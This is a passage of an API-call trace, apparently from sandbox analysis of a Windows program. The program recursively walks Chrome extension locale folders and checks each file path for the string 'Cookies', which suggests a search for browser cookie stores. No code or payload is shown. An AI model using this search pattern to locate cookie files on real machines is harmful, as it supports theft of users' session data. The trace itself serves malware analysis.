Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\" [0163.299] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\") returned 138 [0163.300] lstrlenW (lpString="messages.json") returned 13 [0163.300] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\" [0163.300] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json" [0163.300] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json", lpSrch="Cookies") returned 0x0 [0163.300] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1ea70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x123, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.300] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.300] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1cb30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a1cb30, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="hu", cAlternateFileName="")) returned 1 [0163.300] lstrcmpiW (lpString1="hu", lpString2=".") returned 1 [0163.300] lstrcmpiW (lpString1="hu", lpString2="..") returned 1 [0163.300] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.300] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.300] lstrlenW (lpString="\\") returned 1 [0163.300] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.300] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.300] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.300] lstrlenW (lpString="hu") returned 2 [0163.300] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.300] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="hu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu" [0163.300] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu" [0163.301] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\*.*" [0163.301] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1cb30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a1cb30, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.301] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.301] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1cb30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a1cb30, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.301] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.301] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.301] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1ea70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe6, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.301] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu") returned 137 [0163.301] lstrlenW (lpString="\\") returned 1 [0163.301] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu" [0163.301] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\" [0163.301] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\") returned 138 [0163.301] lstrlenW (lpString="messages.json") returned 13 [0163.301] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\" [0163.301] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json" [0163.301] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json", lpSrch="Cookies") returned 0x0 [0163.301] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1ea70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe6, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.301] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.302] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1cb30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a1cb30, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="id", cAlternateFileName="")) returned 1 [0163.302] lstrcmpiW (lpString1="id", lpString2=".") returned 1 [0163.302] lstrcmpiW (lpString1="id", lpString2="..") returned 1 [0163.302] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.302] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.302] lstrlenW (lpString="\\") returned 1 [0163.302] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.302] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.302] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.302] lstrlenW (lpString="id") returned 2 [0163.302] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.302] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="id" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id" [0163.302] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id" [0163.302] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\*.*" [0163.302] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1cb30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a1cb30, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.302] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.302] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1cb30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a1cb30, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.302] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.302] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.302] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1ea70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.302] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id") returned 137 [0163.303] lstrlenW (lpString="\\") returned 1 [0163.303] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id" [0163.303] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\" [0163.303] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\") returned 138 [0163.303] lstrlenW (lpString="messages.json") returned 13 [0163.303] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\" [0163.303] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json" [0163.303] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json", lpSrch="Cookies") returned 0x0 [0163.303] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1ea70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.303] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.303] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a42c90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a42c90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="it", cAlternateFileName="")) returned 1 [0163.303] lstrcmpiW (lpString1="it", lpString2=".") returned 1 [0163.303] lstrcmpiW (lpString1="it", lpString2="..") returned 1 [0163.303] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.303] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.303] lstrlenW (lpString="\\") returned 1 [0163.303] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 